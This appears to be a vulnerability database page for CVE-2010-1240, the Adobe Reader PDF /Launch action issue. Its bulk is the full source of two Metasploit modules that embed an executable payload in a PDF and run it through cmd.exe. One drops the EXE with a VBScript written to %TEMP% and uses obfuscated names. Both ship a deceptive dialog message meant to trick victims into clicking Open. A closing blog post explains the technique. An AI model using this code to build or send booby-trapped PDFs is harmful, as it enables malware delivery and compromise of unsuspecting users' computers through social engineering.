CVE-2010-1240 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # $Id: adobe_pdf_embedded_exe.rb 11353 2010-12-16 20:11:01Z egypt $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::PDF_Parse include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe PDF Embedded EXE Social Engineering', 'Description' => %q{ This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack. }, 'License' => MSF_LICENSE, 'Author' => [ 'Colin Ames <amesc[at]attackresearch.com>', # initial module 'jduck' # add Documents for vista/win7 ], 'Version' => '$Revision: 11353 $', 'References' => [ [ 'CVE', '2010-1240' ], [ 'OSVDB', '63667' ], [ 'URL', 'http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/' ], [ 'URL', 'http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/' ], [ 'URL', 'http://blog.didierstevens.com/2010/03/29/escape-from-pdf/' ] ], 'Payload' => { 'Space' => 2048, 'DisableNops' => true, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Adobe Reader v8.x, v9.x (Windows XP SP3 English)', { 'Ret' => '' } ] ], 'DefaultTarget' => 0)) register_options( [ OptString.new('INFILENAME', [ true, 'The Input PDF filename.']), OptString.new('EXENAME', [ false, 'The Name of payload exe.']), OptString.new('FILENAME', [ false, 'The output filename.', 'evil.pdf']), OptString.new('LAUNCH_MESSAGE', [ false, 'The message to display in the File: area', "To view the encrypted content please tick the \"Do not show this message again\" box and press Open."]), ], self.class) end def exploit file_name = datastore['INFILENAME'] exe_name = datastore['EXENAME'] print_status("Reading in '#{file_name}'...") stream = read_pdf() print_status("Parsing '#{file_name}'...") pdf_objects = parse_pdf(stream) print_status("Parsing Successful.") xref_trailers = pdf_objects[0] trailers = pdf_objects[1] startxrefs = pdf_objects[2] root_obj = pdf_objects[3] output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxrefs.last) print_status("Creating '#{datastore['FILENAME']}' file...") file_create(output) end def ef_payload(pdf_name,payload_exe,obj_num) if !(payload_exe and payload_exe.length > 0) print_status("Using '#{datastore['PAYLOAD']}' as payload...") payload_exe = generate_payload_exe file_size = payload_exe.length stream = Rex::Text.zlib_deflate(payload_exe) md5 = Rex::Text.md5(stream) else print_status("Using '#{datastore['EXENAME']}' as payload...") file_size = File.size(payload_exe) stream = Rex::Text.zlib_deflate(IO.read(payload_exe)) md5 = Rex::Text.md5(File.read(payload_exe)) end output = String.new() output << "#{obj_num.to_i + 1} 0 obj\r<</UF(#{pdf_name}.pdf)/F(#{pdf_name}.pdf)/EF<</F #{obj_num.to_i + 2} 0 R>>/Desc(#{pdf_name})/Type/Filespec>>\rendobj\r" output << "#{obj_num.to_i + 2} 0 obj\r<</Subtype/application#2Fpdf/Length #{stream.length + 3}/Filter/FlateDecode/DL #{file_size}/Params<</Size #{file_size}/CheckSum<#{md5.upcase}>>>>>stream\r#{stream}\r\nendstream\rendobj\r" return output end def js_payload(pdf_name,obj_num) output = String.new() output << "#{obj_num.to_i + 3} 0 obj\r<</S/JavaScript/JS(this.exportDataObject({ cName: \"#{pdf_name}\", nLaunch: 0 });)/Type/Action>>\rendobj\r" output << "#{obj_num.to_i + 4} 0 obj\r<</S/Launch/Type/Action/Win<</F(cmd.exe)/D(c:\\\\windows\\\\system32)/P(/Q /C " # change to the home drive/path no matter what output << "%HOMEDRIVE%&cd %HOMEPATH%" # check for the pdf in these dirs, in this order.. dirs = [ "Desktop", "My Documents", "Documents" ] dirs.each { |dir| fmt = "&"+ "("+ "if exist \"%s\" "+ "(cd \"%s\")"+ ")" fname = "%s\\\\#{pdf_name}.pdf" % dir output << fmt % [fname, dir] } launch_message = datastore['LAUNCH_MESSAGE'] lines = [] launch_message.gsub(/.{1,80}(?:\s|\Z)/) { lines << $& } if (lines.length > 2) print_status("Warning: the LAUNCH_MESSAGE is more than 2 lines. It may not display correctly.") end output << "&"+ # note: the following doesn't work with spaces, and adding quotes doesn't execute the payload :-/ "(start #{pdf_name}.pdf)"+ # note: The below message modifies the text in the "File:" textfield of the "Launch File" dialog ("\n"*10) + launch_message+ # note: this extra rparen is required. ")"+ ">>>>\rendobj\r" return output end def basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxref) file_name = file_name.split(/\//).pop.to_s match = file_name.match(/(.+)\.pdf/) if match pdf_name = match[1] end catalog = parse_object(xref_trailers,root_obj,stream) match = catalog.match(/Names (\d+ \d) R/m) if match names = parse_object(xref_trailers,match[1],stream) match = names.match(/EmbeddedFiles (\d+ \d) R/m) if match embedded_files = parse_object(xref_trailers,match[1],stream) new_embedded_files = embedded_files.gsub(/(\]>>)/m,"(\xfe\xff#{Rex::Text.to_unicode(pdf_name,"utf-16be")})#{trailers[0].fetch("Size")} 0 R" + '\1') else new_names = names.gsub(/(>>.*)/m,"/EmbeddedFiles #{trailers[0].fetch("Size")} 0 R" + '\1') end else new_catalog = catalog.gsub(/(Pages \d+ \d R)/m,'\1' + "/Names #{trailers[0].fetch("Size")} 0 R") end if catalog.match(/OpenAction/m) match = catalog.match(/OpenAction (\d+ \d) R/m) if match open_action = "#{match[1]} R" if new_catalog if new_embedded_files new_catalog = new_catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch("Size").to_i + 2} 0 R") elsif new_names new_catalog = new_catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch("Size").to_i + 3} 0 R") else new_catalog = new_catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch("Size").to_i + 4} 0 R") end else if new_embedded_files new_catalog = catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch("Size").to_i + 2} 0 R") elsif new_names new_catalog = catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch("Size").to_i + 3} 0 R") else new_catalog = catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch("Size").to_i + 4} 0 R") end end else if new_catalog new_catalog = new_catalog.gsub(/OpenAction ?\[.+\]/m, "OpenAction #{trailers[0].fetch("Size").to_i + 4} 0 R") else new_catalog = catalog.gsub(/OpenAction ?\[.+\]/m, "OpenAction #{trailers[0].fetch("Size").to_i + 3} 0 R") end end else if new_catalog if new_embedded_files new_catalog = new_catalog.gsub(/(Names \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 2} 0 R") elsif new_names new_catalog = new_catalog.gsub(/(Names \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 3} 0 R") else new_catalog = new_catalog.gsub(/(Names \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 4} 0 R") end else if new_embedded_files new_catalog = catalog.gsub(/(Pages \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 2} 0 R") elsif new_names new_catalog = catalog.gsub(/(Pages \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 3} 0 R") else new_catalog = catalog.gsub(/(Pages \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 4} 0 R") end end end pages_obj = catalog.match(/Pages (\d+ \d) R/m)[1] pages = parse_object(xref_trailers,pages_obj,stream) page_obj = pages.match(/Kids ?\[\r?\n? *(\d+ \d) R/m)[1] page = parse_object(xref_trailers,page_obj,stream) match = page.match(/Kids ?\[\r?\n? *(\d+ \d) R/m) while match page_obj = match[1] page = parse_object(xref_trailers,page_obj,stream) match = page.match(/Kids ?\[\r?\n? *(\d+ \d) R/m) end match = page.match(/AA<<\/O (\d+ \d) R/m) if match aa = parse_object(xref_trailers,match[1],stream) end new_pdf = String.new() xrefs = String.new() if new_embedded_files pdf_payload = String.new() num = trailers[0].fetch("Size").to_i - 1 pdf_payload << ef_payload(pdf_name,exe_name,num) pdf_payload << js_payload(pdf_name,num) new_pdf << stream << pdf_payload xrefs = xref_create(new_pdf,stream.length,"*") new_size = trailers[0].fetch("Size").to_i + 4 if aa new_page = page.gsub(/(AA<<\/O )\d+ \d R(.*)/m,'\1' + "#{trailers[0].fetch("Size").to_i + 3} 0" + '\2') else new_page = page.gsub(/(>> *\r?\n? *endobj)/m,"/AA<<\/O #{trailers[0].fetch("Size").to_i + 3} 0 R>>" + '\1') end new_pdf << new_catalog xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1") new_pdf << new_page xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1") new_pdf << new_embedded_files xrefs << xref_create(new_pdf,(new_pdf.length - new_embedded_files.length), "1") if trailers[0].has_key?("ID") new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n" else new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R>>\r\n" end new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_embedded_files.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n" elsif new_names pdf_payload = String.new() num = trailers[0].fetch("Size").to_i pdf_payload << "#{num} 0 obj\r<</Names[(\xfe\xff#{Rex::Text.to_unicode(pdf_name,"utf-16be")})#{num + 1} 0 R]>>\rendobj\r" pdf_payload << ef_payload(pdf_name,exe_name,num) pdf_payload << js_payload(pdf_name,num) new_pdf << stream << pdf_payload xrefs = xref_create(new_pdf,stream.length,"*") new_size = trailers[0].fetch("Size").to_i + 5 if aa new_page = page.gsub(/(AA<<\/O )\d+ \d(.*)/m,'\1' + "#{trailers[0].fetch("Size").to_i + 4} 0" + '\2') else new_page = page.gsub(/(>> *\r?\n? *endobj)/m,"/AA<<\/O #{trailers[0].fetch("Size").to_i + 4} 0 R>>" + '\1') end new_pdf << new_catalog xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1") new_pdf << new_page xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1") new_pdf << new_names xrefs << xref_create(new_pdf,(new_pdf.length - new_names.length), "1") if trailers[0].has_key?("ID") new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n" else new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R>>\r\n" end new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_names.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n" else pdf_payload = String.new() num = trailers[0].fetch("Size").to_i + 1 pdf_payload << "#{trailers[0].fetch("Size")} 0 obj\r<</EmbeddedFiles #{num} 0 R>>\rendobj\r" pdf_payload << "#{num} 0 obj\r<</Names[(#{pdf_name})#{num + 1} 0 R]>>\rendobj\r" pdf_payload << ef_payload(pdf_name,exe_name,num) pdf_payload << js_payload(pdf_name,num) new_pdf << stream << pdf_payload xrefs = xref_create(new_pdf,stream.length,"*") new_size = trailers[0].fetch("Size").to_i + 6 if aa new_page = page.gsub(/(AA<<\/O )\d+ \d(.*)/m,'\1' + "#{trailers[0].fetch("Size").to_i + 5} 0" + '\2') else new_page = page.gsub(/(>> *\r?\n? *endobj)/m,"/AA<<\/O #{trailers[0].fetch("Size").to_i + 5} 0 R>>" + '\1') end new_pdf << new_catalog xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1") new_pdf << new_page xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1") if trailers[0].has_key?("ID") new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n" else new_pdf << "xref\r\n" << xrefs new_pdf << "trailer\r\n" new_pdf << "<</Size #{new_size}/Prev #{startxref}" new_pdf << "/Root #{trailers[0].fetch("Root")} R" new_pdf << "/Info #{trailers[0].fetch("Info")} R>>\r\n" end new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n" end return new_pdf end end

## # $Id: adobe_pdf_embedded_exe_nojs.rb 11353 2010-12-16 20:11:01Z egypt $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## # # Modified version of the Adobe PDF Embedded EXE Social Engineering "adobe_pdf_embedded_exe.rb". # This version does not require JavaScript to be enabled and does not required the EXE to be # attached to the PDF. The EXE is embedded in the PDF in a non-standard method using HEX # encoding. # # Lots of reused code from adobe_pdf_embedded_exe.rb and the other PDF modules to make the PDF. # Thanks to all those that wrote the code for those modules, as I probably could not have # wrote this module without borrowing code from them. # require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe PDF Escape EXE Social Engineering (No JavaScript)', 'Description' => %q{ This module embeds a Metasploit payload into an existing PDF file in a non-standard method. The resulting PDF can be sent to a target as part of a social engineering attack. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jeremy Conway <jeremy[at]sudosecure.net>', ], 'Version' => '$Revision: 11353 $', 'References' => [ [ 'CVE', '2010-1240' ], [ 'OSVDB', '63667' ], [ 'URL', 'http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/' ], [ 'URL', 'http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/' ], [ 'URL', 'http://blog.didierstevens.com/2010/03/29/escape-from-pdf/' ] ], 'Payload' => { 'Space' => 2048, 'DisableNops' => true, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Adobe Reader <= v9.3.3 (Windows XP SP3 English)', { 'Ret' => '' } ] ], 'DefaultTarget' => 0)) register_options( [ OptString.new('EXENAME', [ false, 'The Name of payload exe.', 'msf.exe']), OptString.new('FILENAME', [ false, 'The output filename.', 'evil.pdf']), OptString.new('LAUNCH_MESSAGE', [ false, 'The message to display in the File: area', "To view the encrypted content please tick the \"Do not show this message again\" box and press Open."]), ], self.class) end def exploit # Create the pdf print_status("Making PDF") pdf = make_pdf() print_status("Creating '#{datastore['FILENAME']}' file...") file_create(pdf) end def pdf_exe(payload_exe) if !(payload_exe and payload_exe.length > 0) print_status("Using '#{datastore['PAYLOAD']}' as payload...") payload_exe = generate_payload_exe hex_payload = Rex::Text.to_hex(payload_exe) else print_status("Using '#{datastore['EXENAME']}' as payload...") hex_payload = Rex::Text.to_hex_dump(payload_exe,16) end return hex_payload end def ioDef(id) "%d 0 obj" % id end def ioRef(id) "%d 0 R" % id end #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ def nObfu(str) result = "" str.scan(/./u) do |c| if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' result << "#%x" % c.unpack("C*")[0] else result << c end end result end def ASCIIHexWhitespaceEncode(str) result = "" whitespace = "" str.each_byte do |b| result << whitespace << "%02x" % b whitespace = " " * (rand(3) + 1) end result << ">" end def make_pdf() file_name = datastore['FILENAME'] exe_name = datastore['EXENAME'] launch_msg = datastore['LAUNCH_MESSAGE'] xref = [] eol = "\x0d\x0a" endobj = "endobj" << eol pdf = "%PDF-1.5" << eol payload_exe = generate_payload_exe hex_payload = Rex::Text.to_hex(payload_exe) pdf << hex_payload << eol pdf << ioDef(1) << nObfu("<</Type/Catalog/Outlines ") << ioRef(2) << nObfu("/Pages ") << ioRef(3) << nObfu("/OpenAction ") << ioRef(5) << ">>" << endobj xref << pdf.length pdf << ioDef(2) << nObfu("<</Type/Outlines/Count 0>>") << endobj xref << pdf.length pdf << ioDef(3) << nObfu("<</Type/Pages/Kids[") << ioRef(4) << nObfu("]/Count 1>>") << endobj xref << pdf.length pdf << ioDef(4) << nObfu("<</Type/Page/Parent ") << ioRef(3) << nObfu("/MediaBox[0 0 612 792]>>") << endobj xref << pdf.length pdf << ioDef(5) << nObfu("<</Type/Action/S/Launch/Win ") << "<< " pdf << "/F (cmd.exe) /P (/C echo Set o=CreateObject^(\"Scripting.FileSystemObject\"^):Set f=o.OpenTextFile^(\"#{file_name}\",1,True^):" pdf << "f.SkipLine:Set w=CreateObject^(\"WScript.Shell\"^):Set g=o.OpenTextFile^(w.ExpandEnvironmentStrings^(\"%TEMP%\"^)+\"\\\\#{exe_name}\",2,True^):a=Split^(Trim^(Replace^(f.ReadLine,\"\\\\x\",\" \"^)^)^):" pdf << "for each x in a:g.Write^(Chr^(\"&h\" ^& x^)^):next:g.Close:f.Close > 1.vbs && cscript //B 1.vbs && start %TEMP%\\\\#{exe_name} && del /F 1.vbs" pdf << eol << eol << eol << "#{launch_msg})" pdf << ">>>>" << endobj xref << pdf.length xrefPosition = pdf.length pdf << "xref" << eol pdf << "0 %d" % (xref.length + 1) << eol pdf << "0000000000 65535 f" << eol xref.each do |index| pdf << "%010d 00000 n" % index << eol end pdf << "trailer" << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol pdf << "startxref" << eol pdf << xrefPosition.to_s() << eol pdf << "%%EOF" << eol end end

Title : Escape From PDF Author : Didier Stevens Date : 03/29/2010 Source : http://blog.didierstevens.com/2010/03/29/escape-from-pdf/ This is a special PDF hack: I managed to make a PoC PDF to execute an embedded executable without exploiting any vulnerability! I use a launch action triggered by the opening of my PoC PDF. With Adobe Reader, the user gets a warning asking for approval to launch the action, but I can (partially) control the message displayed by the dialog. Foxit Reader displays no warning at all, the action gets executed without user interaction. PDF viewers like Adobe Reader and Foxit Reader don’t allow embedded executables (like binaries and scripts) to be extracted and executed, but I found another way to launch a command (/Launch /Action), and ultimately run an executable I embedded using a special technique. With Adobe Reader, a launch action needs to be approved by the user, but I can partially control the message displayed by the dialog box. Example 1: http://didierstevens.files.wordpress.com/2010/03/20100329-211248.png?w=478&h=262 Example 2: http://didierstevens.files.wordpress.com/2010/03/20100329-211313.png?w=478&h=262 Do you believe this could this mislead some of your users? Or maybe you can come up with a better message to fool your users. With Foxit Reader, no warning is displayed: Example 3: http://didierstevens.files.wordpress.com/2010/03/20100329-211310.png?w=457&h=385 I’m not publishing my PoC PDF yet, but you can download a PDF that will just launch cmd.exe here. Use it to test your PDF reader: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11987.zip (launch-action-cmd.zip) With Adobe Reader, the only thing preventing execution is a warning. Disabling JavaScript will not prevent this (I don’t use JavaScript in my PoC PDF), and patching Adobe Reader isn’t possible (I’m not exploiting a vulnerability, just being creative with the PDF language specs). I shared my PoC with Adobe’s PSIRT. Maybe they will come up with a solution to prevent this, should they consider that the protection offered by the warning dialog is not sufficient. BTW, preventing Adobe Reader from creating new processes blocks this trick. n this case, Foxit Reader is probably worse than Adobe Reader, because no warning gets displayed to prevent the launch action. My PoC PDF requires some changes for Foxit Reader, because ultimately, the executable doesn’t run. But that’s probably due to some variation in the PDF language supported by Foxit Reader. Tested with Adobe Reader 9.3.1 on Windows XP SP3 and Windows 7.